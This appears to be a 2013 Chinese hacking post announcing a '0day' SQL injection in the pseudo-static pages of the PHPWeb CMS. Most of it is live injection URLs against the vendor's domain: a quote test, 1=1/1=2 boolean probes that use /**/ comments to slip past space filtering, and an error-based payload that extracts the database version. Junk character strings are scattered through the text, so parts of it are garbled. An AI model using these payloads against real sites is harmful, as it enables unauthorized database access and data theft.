phpweb伪静态页面注入0day

admin

phpweb所有的整站程序伪静态页面都存在sql注入

- j5 S& J. D! I  S2 J( y9 P主站：http://phpweb.net/
7 A2 M4 v3 Y( Q加’检测：
1 L. v# M- v! u, T+ {% p/ g8 \
' w) G* I# d. v1 B1 X, zhttp://www.phpweb.net/down/html/?772′.html

9 Z6 |  V% M: X# s8 w& N4 o出错
存在注入。
8 c. r# y" G% y  w. O不能用空格，只能用/*罗
* }- o: z1 r  e! r9 H. phttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
4 ^0 a+ p" \+ J3 U" H' [
, p+ }, g. D- s+ ~% qhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
5 L: `" {  B, N; D3 V爆数据库版本：
5 D: X  B2 G1 [: N! y# ]
3 G2 s$ G* e3 T+ a?
1 E9 x, U$ @" l5 w1
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
9 O1 f9 c! E" p; b) f/ d更新日期: 2013-01-03 13:39:50